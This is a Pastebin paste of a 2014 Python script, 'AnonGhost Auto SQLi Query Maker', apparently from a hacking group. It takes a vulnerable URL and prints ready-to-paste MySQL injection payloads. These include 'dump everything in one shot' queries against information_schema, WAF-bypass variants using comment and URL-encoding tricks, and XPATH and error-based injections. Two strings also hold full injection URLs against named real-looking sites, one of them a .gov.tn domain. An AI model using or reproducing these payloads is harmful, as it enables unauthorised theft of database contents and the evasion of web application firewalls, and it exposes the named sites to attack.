Googleinurl

[SCRIPT]=> AnonGhost Auto SQLi Query Maker

Sep 9th, 2014
1,510
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #/!python
  2. import time
  3.  
  4. time.sleep(.5)
  5. print "\n        ---####################################################---"
  6. print "      -----#                                                  #-----"
  7. print "   --------#       AnonGhost Auto SQLi Query Maker            #--------"
  8. print "      -----#                   Coded By -tr0jAn*              #-----"
  9. print "        ---#                                                  #---"
  10. print "          -####################################################-\n\n"
  11. time.sleep(.7)
  12. print "\n Greets To :\n ------------------------------------------------------------------------------\nrummykhan :: MakMan :: madcodE :: Mauritania Attacker :: HusseiN98d :: Kai H4x0r :: j0k3r :: Ch3rn0by1 :: vIrkId :: Zen :: Mr.Nob :: Shafoon :: G~26 :: madblood :: Str!k3r :: No~FacE :: Tech Prospect :: ajkaro \n---------------------------- PCP :: PHC :: AnonGhost ---------------------------"
  13. time.sleep(1)
  14. print "\n"
  15. url = raw_input("Website Vulnerable URL : ")
  16.  
  17.  
  18. #               username = "test"
  19. #               if(username !='trojan' or username !='anonghost' or username !='test'):
  20. #                   print "Invalid ! Please Enter The Correct Login"
  21. #               else:
  22. #                   continue
  23.  
  24. rp = "Just Paste This In 'Hackbar' OR 'URL Bar' And After It Do The UNION SELECTION.. Then Replace The Vulnerable Column With @x And See The MAGIC :D"
  25. sdt = "div @x:=concat((select(@)from(Select(@:=0x00),(@r:=0),(select(@)from(information_schema.tables)Where(table_schema=database())and(@)in(@:=concat(@,0x3c62723e,LPAD(@r:=@r%2b1,2,0x30),0x2e20,unhex(hex(table_name))))))x))"
  26. sdtc = "div @x:=concat((select(@)from(Select(@:=0x00),(select(@)from(information_schema.columns)Where(table_schema=database())and(@)in(@:=concat(@,0x3c62723e,unhex(hex(table_name)),0x203a3a3a20,unhex(hex(column_name))))))x))"
  27. gct = "div @x:=concat(if(@a!=0,@a:=0,@a:=0),0x3c62723e3c62723e,(select unhex(hex(group_concat(lpad(@a:=@a%2b1,2,0x30),0x2e20,table_name separator 0x3c62723e))) from information_schema.tables where table_schema=database()))"
  28. dtwf = "div @x:=concat/*!((/*!00000select*/ (@) /*!from*/ (/*!00000select*/ (@:=0x00),(@r:=0),(/*!00000select*/ (@) from(information_schema./**/tables)where(table_schema=database())and(@)in(@:=concat/*!(@,0x3c62723e,LPAD(@r:=@r%2b1,2,0x30),0x2e20,unhex(hex(table_name))))))x))*/"
  29. dtcwf = "div @x:=concat/*!((/*!00000select*/ (@) /*!from*/ (/*!00000select*/ (@:=0x00),(@r:=0),(/*!00000select*/ (@) from(information_schema./**/columns)where(table_schema=database())and(@)in(@:=concat/*!(@,0x3c62723e,unhex(hex(table_name)),0x203a3a20,unhex(hex(column_name))))))x))*/"
  30. mdwf = "div @x:=concat/*!(unhex(hex(concat/*!(0x3c2f6469763e3c2f696d673e3c2f613e3c2f703e3c2f7469746c653e,0x223e,0x273e,0x3c62723e3c62723e,unhex(hex(concat/*!(0x3c63656e7465723e3c666f6e7420636f6c6f723d7265642073697a653d343e3c623e3a3a207e7472306a416e2a2044756d7020496e204f6e652053686f74205175657279203c666f6e7420636f6c6f723d626c75653e28574146204279706173736564203a2d20207620312e30293c2f666f6e743e203c2f666f6e743e3c2f63656e7465723e3c2f623e))),0x3c62723e3c62723e,0x3c666f6e7420636f6c6f723d626c75653e4d7953514c2056657273696f6e203a3a20,version(),0x7e20,@@version_comment,0x3c62723e5072696d617279204461746162617365203a3a20,@d:=database(),0x3c62723e44617461626173652055736572203a3a20,user(),(/*!12345selEcT*/(@)/*!from*/(/*!12345selEcT*/(@:=0x00),(@r:=0),(@running_number:=0),(@tbl:=0x00),(/*!12345selEcT*/(0) from(information_schema./**/columns)where(table_schema=database()) and(0x00)in(@:=Concat/*!(@, 0x3c62723e, if( (@tbl!=table_name), Concat/*!(0x3c666f6e7420636f6c6f723d707572706c652073697a653d333e,0x3c62723e,0x3c666f6e7420636f6c6f723d626c61636b3e,LPAD(@r:=@r%2b1, 2, 0x30),0x2e203c2f666f6e743e,@tbl:=table_name,0x203c666f6e7420636f6c6f723d677265656e3e3a3a204461746162617365203a3a203c666f6e7420636f6c6f723d626c61636b3e28,database(),0x293c2f666f6e743e3c2f666f6e743e,0x3c2f666f6e743e,0x3c62723e), 0x00),0x3c666f6e7420636f6c6f723d626c61636b3e,LPAD(@running_number:=@running_number%2b1,3,0x30),0x2e20,0x3c2f666f6e743e,0x3c666f6e7420636f6c6f723d7265643e,column_name,0x3c2f666f6e743e))))x)))))*/"
  31. mds = "div @x:=unhex(hex(concat(0x3c2f6469763e3c2f696d673e3c2f613e3c2f703e3c2f7469746c653e,0x223e,0x273e,0x3c62723e3c62723e,concat(concat(0x3c63656e7465723e3c666f6e7420636f6c6f723d7265642073697a653d343e3c623e3a3a207e7472306a416e2a2044756d7020496e204f6e652053686f74205175657279203a3a203c2f666f6e743e3c2f63656e7465723e3c2f623e),0x3c62723e3c62723e,0x3c666f6e7420636f6c6f723d626c75653e4d7953514c2056657273696f6e203a3a20,version(),0x7e,@@version_comment,0x3c62723e5072696d617279204461746162617365203a3a20,@d:=database(),0x3c62723e44617461626173652055736572203a3a20,user(),concat(0x3c62723e3c62723e546f74616c204e756d626572204f6620446174616261736573203a3a20,(select count(*) from information_schema.schemata),0x3c62723e546f74616c205461626c657320496e20416c6c20446174616261736573203a3a20,(select count(*) from information_Schema.tables),0x3c62723e5461626c657320436f756e7420496e205072696d617279204461746162617365203a3a20,(Select count(*) from information_Schema.tables where table_schema=database()),(select(@)from(select(@:=0x00),(@r:=0),(@running_number:=0),(@tbl:=0x00),(select(0) from(information_schema.columns)where(table_schema=database()) and(0x00)in(@:=Concat(@, 0x3c62723e, if( (@tbl!=table_name), Concat(0x3c666f6e7420636f6c6f723d707572706c652073697a653d333e,0x3c62723e,LPAD(@r:=@r%2B1, 2, 0x30),0x2e,@tbl:=table_name,0x3c666f6e7420636f6c6f723d626c61636b3e203a3a20436f6c756d6e7320496e2054686973205461626c65203a3a20,(select count(*) from information_Schema.columns where table_name=@tbl),0x20284461746162617365203a3a20,database(),0x29,0x3c2f666f6e743e,0x3c62723e), 0x00),0x203a3a20,0x3c666f6e7420636f6c6f723d677265656e2073697a653d323e,0x7e20,column_name,0x3c2f666f6e743e ))))x))))))"
  32. dd = "div @x:=concat((select(@)from(select(@:=0x00),(select(@)from(information_schema.schemata)where(@)in(@:=concat(@,0x3c62723e,unhex(hex(schema_name))))))x))"
  33. ddwf = "div @x:=concat/*!((/*!00000select*/(@)/*!from*/(/*!00000select*/(@:=0x00),(/*!00000select*/(@)from(information_schema./**/schemata)where(@)in(@:=concat/*!(@,0x3c62723e,unhex(hex(schema_name))))))x))*/"
  34. gcd = "div @x:=concat(if(@a!=0,@a:=0,@a:=0),0x3c62723e3c62723e,(select group_concat(lpad(@a:=@a%2b1,2,0x30),0x2e20,unhex(hex(schema_name)) separator 0x3c62723e) from information_Schema.schemata))"
  35. bdz = "div @x:=(select(select concat(@:=0xa7,(select count(*)from(information_schema.columns)where(table_schema=database())and(@:=concat(@,0x3c6c693e,table_name,0x3a,column_name))),@)))"
  36. bdzwf = "div @x:=(/*!00000select*/(/*!00000select*/ concat/*!(@:=0xa7,(/*!00000select*/ count(*)/*!from*/(information_schema./**/columns)where(table_schema=database())and(@:=concat/*!(@,0x3c6c693e,table_name,0x203a3a20,column_name))),@)*/))"
  37. bmb = "div @x:=(Select export_set(5,@:=0,(select count(*)from(information_schema.columns)where(table_schema=database())and @:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))"
  38. bmbwf = "div @x:=(/*!00000Select*/ export_set(5,@:=0,(/*!00000select*/ count(*)/*!from*/(information_schema./**/columns)where(table_schema=database()) and @:=export_set(5,export_set(5,@,/*!table_name*/,0x3c6c693e,2),/*!column_name*/,0x203a3a20,2)),@,2))"
  39. msd = "div @x:=make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where(table_schema=database())and @:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)"
  40. msdwf = "div @x:=make_set(6,@:=0x0a,(/*!00000select*/(1)/*!from*/(information_schema./**/columns)where(table_schema=database())and @:=make_set(511,@,0x3c6c693e,/*!table_name*/,0x203a3a20,/*!column_name*/)),@)"
  41. bkt = "div @x:=concat(@i:=0x00,@x:=0x00,benchmark(10,@x:=CONCAT(@x,(SELECT concat(0x3c62723e,@i:=table_name) from information_schema.tables where (table_schema=database()) and table_name >@i order by table_name LIMIT 1))),@x)"
  42. dec = "div @x:=(select(select concat(@:=0xa7,(select count(*)from(information_schema.columns)where(@:=concat(@,0x3c6c693e,table_schema,0x203a3a20,table_name,0x203a3a20,column_name))),@)))"
  43. dewc = "div @x:=make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where @:=make_set(511,@,0x3c6c693e,table_name,0x203a20,table_name,0x203a20,column_name)),@)"
  44. bktwf = "div @x:=concat/*!(@i:=0x00,@y:=0x00,benchmark(10,@y:=CONCAT/*!(@y,(/*!00000SELECT*/ concat/*!(0x3c62723e,@i:=table_name) /*!from*/ information_schema./**/tables where (table_schema=database()) and table_name >@i order by table_name LIMIT 1))),@y)"
  45. decwf = "div @x:=(/*!00000select*/(/*!00000select*/ concat/*!(@:=0xa7,(/*!00000select*/ count(*)/*!from*/(information_schema./**/columns)where(@:=concat/*!(@,0x3c6c693e,table_schema,0x202d2d2d3e20,table_name,0x203a3a20,column_name))),@)*/))"
  46. dewcwf = "div @x:=make_set(6,@:=0x0a,(/*!00000select*/(1)/*!from*/(information_schema./**/columns)where@:=make_set(511,@,0x3c6c693e,/*!table_schema*/,0x203a3a20,/*!table_name*/,0x203a3a20,/*!column_name*/)),@)"
  47. ueb = "div @x:=%63oncaT((%53elECt (@x) %66rom (%53elECt (@x:=0x00),(@r:=0),(%53elECt (0) from(%69nformation_schema.tables)%77here (%74ablE_schema=database()) and (0x00) in (@x:=%63oncat (@x,0x3c62723e,0x3c666f6e7420636f6c6f723d626c61636b3e,LPAD(@r:=@r%2b1,2,0x30),0x2920,0x3c2f666f6e743e,%74able_name))))x)) %55nion %53elect "
  48. escb = "div @x:=(concat_ws((0x0),(select(@)from(select(@:=0x00),(@r:=0),(select(@)from(informatioN_schema.tables)where(table_Schema=database())and(@)in(@:=concat_ws((0x0),(@),(0x3c62723e),(LPAD((@r:=@r%2b1),(2),(0x30))),(0x2e20),(table_name),(0x0)))))x))))UNION(select([No.Of Cols Here With Separate Brackets like (1),(2),(3)])"
  49. hwb = "div @x:=concat_ws(0x00,(/*!00000select*%2f(@)/*!from*%2f(/*!00000select*%2f(@:=0x00),(/*!00000select*%2f(@)/*!from*%2f(/*!information_schema*%2f.columns)/*!where*%2f(table_schema=database/*!()*%2f)and(0x00)in/*!(@:=concat_ws(0x00,(@),(0x3c62723e),(table_name),(0x203a3a20),(column_name))*%2f)))x))"
  50. myb = "div @x:=concat(0x3c666f6e7420636f6c6f723d7265643e3c62723e3c62723e7e7472306a416e2a203a3a3c666f6e7420636f6c6f723d626c75653e20,version(),0x3c62723e546f74616c204e756d626572204f6620446174616261736573203a3a20,(select count(*) from information_schema.schemata),0x3c2f666f6e743e3c2f666f6e743e,0x202d2d203a2d20,concat(@sc:=0x00,@scc:=0x00,@r:=0,benchmark(@a:=(select count(*) from information_schema.schemata),@scc:=concat(@scc,0x3c62723e3c62723e,0x3c666f6e7420636f6c6f723d7265643e,LPAD(@r:=@r%2b1,3,0x30),0x2e20,(Select concat(0x3c623e,@sc:=schema_name,0x3c2f623e) from information_schema.schemata where schema_name>@sc order by schema_name limit 1),0x202028204e756d626572204f66205461626c657320496e204461746162617365203a3a20,(select count(*) from information_Schema.tables where table_schema=@sc),0x29,0x3c2f666f6e743e,0x202e2e2e20 ,@t:=0x00,@tt:=0x00,@tr:=0,benchmark((select count(*) from information_Schema.tables where table_schema=@sc),@tt:=concat(@tt,0x3c62723e,0x3c666f6e7420636f6c6f723d677265656e3e,LPAD(@tr:=@tr%2b1,3,0x30),0x2e20,(select concat(0x3c623e,@t:=table_name,0x3c2f623e) from information_Schema.tables where table_schema=@sc and table_name>@t order by table_name limit 1),0x203a20284e756d626572204f6620436f6c756d6e7320496e207461626c65203a3a20,(select count(*) from information_Schema.columns where table_name=@t),0x29,0x3c2f666f6e743e,0x202d2d3a20,@c:=0x00,@cc:=0x00,@cr:=0,benchmark((Select count(*) from information_schema.columns where table_schema=@sc and table_name=@t),@cc:=concat(@cc,0x3c62723e,0x3c666f6e7420636f6c6f723d707572706c653e,LPAD(@cr:=@cr%2b1,3,0x30),0x2e20,(Select (@c:=column_name) from information_schema.columns where table_schema=@sc and table_name=@t and column_name>@c order by column_name LIMIT 1),0x3c2f666f6e743e)),@cc,0x3c62723e)),@tt)),@scc),0x3c62723e3c62723e,0x3c62723e3c62723e)"
  51. uniq1 = "http://www.grandprix-tunis.gov.tn/en/index1.php?id=-21 /*!UNION*%2f /*!SELECT*%2f (1),concat_ws(0x00,(/*!00000select*%2f(@)/*!from*%2f(/*!00000select*%2f(@:=0x00),(/*!00000select*%2f(@)/*!from*%2f(/*!information_schema*%2f.columns)/*!where*%2f(table_schema=database/*!()*%2f)and(0x00)in/*!(@:=concat_ws(0x00,(@),(0x3c62723e),(table_name),(0x203a3a20),(column_name))*%2f)))x)),(3),(4),(5)"
  52. uniq2 = "http://uit.com.pk/uit_2.php?id=2 div 0 union%23BBBBBBBBUUUUUUUUUUUFFFFFFFFFFFFFFFEEEEEEEEEEEEERRRRRRRRRRRRRRRR...OOOOOOOOVVVVVVVEEEEEEEEEERRRRRRRRRRRRRFFFFFFFLLLLLLLLLLLOOOOOOOOOOWWWWWWWWWWWW%0aselect 1,concat%23aaaaaaaaaaaaa%0a(' :: Injected By -tr0jAn* :: ' ,version%23aaaaaaaaa..aa%0a(),' :: ',database%23aaaaaa%0a()),0x0"
  53. xp = " and updatexml(0x3a,concat(0x3a,version()),null) "
  54. xpwf = " and updatexml(0x3a,concat/*!(0x3a,version())*/,null) "
  55. err = " or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1"
  56. dq = " and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char), 0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1"
  57. xptwf = " and updatexml(0x3a,concat/*!(0x3a,(/*!00000SelEcT*/ concat/*!(table_name)*/ /*!from*/ information_schema./**/tables where table_schema=database() limit 0,1))*/,null) "
  58. xpt = " and updatexml(0x3a,concat(0x3a,(select concat(table_name) from information_schema.tables where table_schema=database() limit 0,1)),null) "
  59. un = "UnIoN SeLEcT [No. Of Columns Here .. ]"
  60. unf = "/*!00000UniOn*/ /*!00000SelEcT*/ [No . Of Columns Here .. ]"
  61.  
  62. time.sleep(1)
  63. print "\nLoading..\n"
  64. time.sleep(.5)
  65. #    $ch==($sh)length-($g)
  66. #      while $ch != $sh
  67. #           $g == $sh
  68.  
  69. waf =  raw_input("WAF ? Y or N : ")
  70.  
  71. if(waf =='y' or waf =='Y' or  waf =='yes' or waf =='YES' or waf =='Yes'):
  72.         time.sleep(.5)
  73.         print "\nLoading Data .. "
  74.         time.sleep(.6)
  75.         print "\n## :: WAF Bypassed Queries :: ## \n"
  76.         print "\nCODE :: --Queries "
  77.         print "01 -- -- Tables DIOS WAF Bypassed"
  78.         print "02 -- -- Tables With Columns DIOS WAF Bypassed "
  79.         print "03 -- -- TrojAn DIOS Query WAF Bypassed"
  80.         print "04 -- -- XPATH Injection WAF Bypassed "
  81.         print "05 -- -- Databases DIOS WAF Bypassed"
  82.         print "06 -- -- Escape Character DIOS WAF Bypassed "
  83.         print "07 -- -- URL Encoding DIOS WAF Bypassed "
  84.         print "08 -- -- High WAF DIOS Tables With Columns Bypassed "
  85.         print "09 -- -- DIOS By Dr.Z3r0 WAF Bypassed "
  86.         print "10 -- -- DIOS By Mad Blood WAF Bypassed "
  87.         print "11 -- -- DIOS Without Concat WAF Bypassed "
  88.         print "12 -- -- Tables DIOS Using Benchmark() WAF Bypassed "
  89.         print "13 -- -- Dumping Everything In One Shot WAF Bypassed "
  90.         print "14 -- -- Dumping Everything In One Shot Without Concat WAF Bypassed"
  91.         print "15 -- -- Unique WAF Site Bypassed "
  92.         print "16 -- -- Unique Buffer OverFlow Site Bypassed "
  93.        
  94.        
  95.         print "\n"
  96.         askwf = raw_input("What Query Do You Want ? .. Please Enter Code : ")
  97.         time.sleep(.7)
  98.         print "\nLoading Your Query "
  99.         time.sleep(.5)
  100.         if(askwf =='01'):
  101.             print "\nTables DIOS WAF Bypassed\n"
  102.             time.sleep(.8)
  103.             print url + " " + dtwf + unf + " " + "\n\n" + rp
  104.         elif(askwf =='02'):
  105.             print "\n Tables With Columns DIOS WAF Bypassed\n"
  106.             time.sleep(.8)
  107.             print url + " " + dtcwf + " " + unf + "\n\n" + rp
  108.         elif(askwf =='03'):
  109.             print "\nTrojAn DIOS Query WAF Bypassed\n"
  110.             time.sleep(.8)
  111.             print url + " " + mdwf + " " + unf + "\n\n" + rp
  112.         elif(askwf =='04'):
  113.             print "\nXPATH Injection WAF Bypassed"
  114.             time.sleep(.8)
  115.             print url + xpwf + "\n"
  116.             time.sleep(.6)
  117.             print "\n"
  118.             xpask = raw_input("Grab Tables ? Y or N :")
  119.             time.sleep(.8)
  120.             if(xpask =='y' or xpask =='yes' or xpask =='Y' or xpask =='YES' or xpask =='Yes' or xpask =='Ye' or xpask =='ye'):
  121.                 print "XPATH Injection Getting Tables\n "
  122.                 time.sleep(.5)
  123.                 print url + xptwf + "\n\nIncrease The Limit By 0,1 to '1,1' -- '2,1' -- '3,1' For Getting All Other Tables "
  124.         elif(askwf =='05'):
  125.             print "\nDatabases DIOS WAF Bypassed\n"
  126.             time.sleep(.8)
  127.             print url + " " + ddwf + " " + unf + "\n\n" + rp
  128.         elif(askwf =='06'):
  129.             print "\nEscape Character DIOS Bypassed \n"
  130.             time.sleep(.8)
  131.             print url + " " + escb + " " + "\n\n" + rp
  132.         elif(askwf =='07'):
  133.             print "\nURL Encoding WAF Bypassed "
  134.             time.sleep(.8)
  135.             print url + " " + ueb + " " + "\n\n" + rp
  136.         elif(askwf =='08'):
  137.             print "\nHigh WAF Tables With Columns Bypassed \n"
  138.             time.sleep(.8)
  139.             print url + " " + hwb + " " + "/*!00000%55niOn*%2f /*!00000%53eLeCT*%2f [No. Of Columns Here With Separate Brackets like this (1),(2),(3)]" + "\n\n" + rp
  140.         elif(askwf =='09'):
  141.             print "\nDIOS By Dr.Z3r0 WAF Bypassed \n"
  142.             time.sleep(.8)
  143.             print url + " " + bdzwf + " " + unf + "\n\n" + rp
  144.         elif(askwf =='10'):
  145.             print "\nDIOS By MadBlood WAF Bypassed \n"
  146.             time.sleep(.8)
  147.             print url + " " + bmbwf + " " + unf + "\n\n" + rp
  148.         elif(askwf =='11'):
  149.             print "\n DIOS Without Concat WAF Bypassed \n"
  150.             time.sleep(.8)
  151.             print url + " " + msdwf + " " + unf + "\n\n" + rp
  152.         elif(askwf =='12'):
  153.             print "\nTables DIOS Using Benchmark WAF Bypassed \n"
  154.             time.sleep(.8)
  155.             print url + " " + bktwf + " " + unf + "\n\n" + rp
  156.         elif(askwf =='13'):
  157.             print "\nDumping Everything In One Shot WAF Bypassed \n"
  158.             time.sleep(.8)
  159.             print url + " " + decwf + " " + unf + "\n\n" + rp
  160.         elif(askwf =='14'):
  161.             print "\nDumping Everything In One Shot Without CONCAT WAF Bypassed\n"
  162.             time.sleep(.8)
  163.             print url + " " + dewcwf + " " + unf + "\n\n" + rp
  164.         elif(askwf =='15'):
  165.             print "\nUnique WAF Website Bypassed \n "
  166.             time.sleep(.8)
  167.             print "Query :: \n----------\n" + uniq1
  168.         elif(askwf =='16'):
  169.             print "\nUnique WAF [Buffer Overflow] Website Bypassed \n"
  170.             time.sleep(.8)
  171.             print "Query :: \n----------\n" + uniq2
  172.            
  173. #             $wf == $by(length-($g)
  174. #                   while $wf != $g
  175. #                       $by = $g
  176. #                       where $by == $wf
  177. #                       then print " $by " + " $g " + " wf "
  178. #                                   else die($g + $wf + $by):($b)
  179.                
  180.         else:
  181.             time.sleep(.8)
  182.             print "You Have Entered An Invalid Code .. "
  183.            
  184.            
  185. elif(waf =='N' or waf =='n' or waf =='NO' or waf =='no' or waf =='No'):
  186.         print "## :: Simple Non-WAF Queries :: ## \n"
  187.         time.sleep(.7)
  188.         print "Loading Data .. "
  189.         time.sleep(.8)
  190.         print "\nCODE :: -- Queries \n"
  191.         print "001 -- -- Tables DIOS Simple "
  192.         print "002 -- -- Tables With Columns DIOS Simple "
  193.         print "003 -- -- Getting Tables With Group_concat Function "
  194.         print "004 -- -- TrojAn DIOS Query Simple "
  195.         print "005 -- -- XPATH Injection "
  196.         print "006 -- -- Databases DIOS "
  197.         print "007 -- -- Getting Databases With Group_concat Function"
  198.         print "008 -- -- Tables DIOS Using Benchmark() "
  199.         print "009 -- -- DIOS By Dr.Z3ro "
  200.         print "010 -- -- DIOS By Mad Blood "
  201.         print "011 -- -- DIOS Without Concat "
  202.         print "012 -- -- TrojAn Benchmark() Query "
  203.         print "013 -- -- Dump Everything With Concat "
  204.         print "014 -- -- Dump Everything Without Concat "
  205.         print "015 -- -- Escape Character Bypass "
  206.         print "016 -- -- Getting Version With Error Based Injection"
  207.         print "017 -- -- Getting Version With Double Query Injection "
  208.        
  209.         print "\n"
  210.         asks = raw_input("What Query Do You Want ? Enter Code : ")
  211.         time.sleep(.5)
  212.         print "Loading Your Query .."
  213.         time.sleep(.5)
  214.         if(asks == '001'):
  215.             print "\nTables DIOS Simple\n"
  216.             time.sleep(.8)
  217.             print url + " " + sdt + " " + un + "\n\n" + rp
  218.         elif(asks =='002'):
  219.             print "\nTables With Columns DIOS Simple\n"
  220.             time.sleep(.8)
  221.             print url + " " + sdtc + " " + un + "\n\n" + rp
  222.         elif(asks =='003'):
  223.             print "\nGetting Tables With Group_concat Function\n"
  224.             time.sleep(.8)
  225.             print url + " " + gct + " " + un + "\n\n" + rp
  226.         elif(asks =='004'):
  227.             print "\nTrojAn DIOS Query Simple\n"
  228.             time.sleep(.8)
  229.             print url + " " + mds + " " + un + "\n\n" + rp
  230.         elif(asks =='005'):
  231.             print "\nXPATH Injection\n"
  232.             time.sleep(.8)
  233.             print url + xp + "\n"
  234.             time.sleep(.6)
  235.             xpasks = raw_input("Grab Tables ? Y or N :")
  236.             if(xpasks =='y' or xpasks =='yes' or xpasks =='Y' or xpasks =='YES' or xpasks =='Yes' or xpasks =='Ye' or xpasks =='ye'):
  237.                 print "\nXPATH Injection Getting Tables\n "
  238.                 time.sleep(.5)
  239.                 print url + xpt + "\n\nIncrease The Limit By 0,1 to '1,1' -- '2,1' -- '3,1' For Getting All Other Tables "
  240.         elif(asks =='006'):
  241.             print "\nDatabases DIOS\n"
  242.             time.sleep(.8)
  243.             print url + " " + dd + " " + un + "\n\n" + rp
  244.         elif(asks =='007'):
  245.             print "\nGetting Databases With GROUP_CONCAT() Function\n"
  246.             time.sleep(.8)
  247.             print url + " " + gcd + " " + un + "\n\n" + rp
  248.         elif(asks =='008'):
  249.             print "\nTables DIOS Using Benchmark() \n"
  250.             time.sleep(.8)
  251.             print url + " " + bkt + " " + un + "\n\n" + rp
  252.         elif(asks =='009'):
  253.             print "\nDIOS by Dr.Z3ro\n"
  254.             time.sleep(.8)
  255.             print url + " " + bdz + " " + un + "\n\n" + rp
  256.         elif(asks =='010'):
  257.             print "\nDIOS By Mad Blood \n"
  258.             time.sleep(.8)
  259.             print url + " " + bmb + " " + un + "\n\n" + rp
  260.         elif(asks =='011'):
  261.             print "\nDIOS Without Concat\n"
  262.             time.sleep(.8)
  263.             print url + " " + msd + " " + un + "\n\n" + rp
  264.         elif(asks =='012'):
  265.             print "\nTrojAn Benchmark() Query\n"
  266.             time.sleep(.8)
  267.             print url + " " + myb + " " + un + "\n\n" + rp
  268.         elif(asks =='013'):
  269.             print "\nDump Everything With Concat Function\n"
  270.             time.sleep(.8)
  271.             print url + " " + dec + " " + un + "\n\n" + rp
  272.         elif(asks =='014'):
  273.             print "\nDump Everything Without Concat Function \n"
  274.             time.sleep(.8)
  275.             print url + " " + dewc + " " + un + "\n\n" + rp
  276.         elif(asks =='015'):
  277.             print "\n Escape Character Bypass \n"
  278.             time.sleep(.8)
  279.             print url + " " + escb + "\n\n" + rp
  280.         elif(asks =='016'):
  281.             print "\nGetting Version With Error Based Injection\n"
  282.             time.sleep(.8)
  283.             print url + err + "\n\n"
  284.         elif(asks =='017'):
  285.             print "\nGetting Version With Double Query Injection\n"
  286.             time.sleep(.8)
  287.             print url + dq + "\n\n"
  288.        
  289. #                  $nb == $qr(length-($s))
  290. #                       while $nb != $qr
  291. #                        then $nb == $s
  292. #                   else $qr != $s
  293. #                           split $length-($s + $nb + $qr )
  294.                
  295.        
  296.         else:
  297.             time.sleep(.8)
  298.             print "You Have Entered An Invalid Code "
  299.        
  300. else:
  301.         print "You Have Entered An Incorrect Data"
  302.        
  303.        
  304.  
  305. time.sleep(2)
  306. print "\n\n\nClosing All Functions.."
  307. time.sleep(1)
  308. print "Exiting.."
  309. time.sleep(3.5)
RAW Paste Data